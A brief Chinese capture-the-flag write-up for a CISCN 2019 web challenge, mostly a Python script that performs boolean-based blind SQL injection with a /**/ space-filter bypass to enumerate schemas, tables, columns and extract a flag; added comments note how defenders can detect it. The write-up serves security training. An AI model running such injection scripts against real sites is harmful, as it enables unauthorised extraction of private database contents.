[CISCN 2019华北Day2]Web1
开题一眼就能看出是 SQL 注入

抓个包,发现是POST注入

试了一下,过滤了空格,用括号绕过,是个盲注
直接贴个脚本
# Boolean-based blind SQL injection extractor from the write-up above.
# One HTTP POST is sent per binary-search step; the oracle is whether the
# literal "Hello" appears in the response body (see the `if` below).
#
# Defender's notes (what this looks like from the server side):
#   - The traffic is extremely regular: a burst of POSTs to index.php whose
#     `id` field differs only in the two integers substituted into
#     `ascii(substr(...,{0},1))>{1}`, several requests per extracted
#     character. That regularity is what a log/WAF rule can key on.
#   - The space filter described in the write-up is bypassed with `/**/`
#     and parentheses, so a whitespace/keyword blocklist is not a fix;
#     parameterised queries are.
import requests
import time  # imported but not used below
url = "http://node2.anna.nssctf.cn:28326/index.php"
payload = {
	"id" : ""
}
result: str = ""
# Extract up to 99 characters; each character costs one binary search.
for i in range(1,100):
	# Search window for the character's ASCII code, [33, 130).
	l = 33
	r =130
	mid = (l+r)>>1
	while(l<r):
		# enumerate schema names
		#"0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})".format(i, mid)
		# enumerate table names
		#"0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctf'),{0},1))>{1})".format(i, mid)
		# enumerate column names
		#"0^" + "(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'f111'),{0},1))>{1})".format(i,mid)
		#######################
		#"0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)
		# Probe: "is the ASCII code of character i greater than mid?"
		payload["id"] ="0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)
		html = requests.post(url,data=payload)
		print(payload)
		# Oracle: the page contains "Hello" when the comparison holds.
		if "Hello" in html.text:
			l = mid+1
		else:
			r = mid
		mid = (l+r)>>1
	# The loop exits with l == r, so mid == l is the converged code.
	# A space is treated as the end of the string.
	if(chr(mid)==" "):
		break
	result = result + chr(mid)
	print(result)
print("flag: " ,result)



















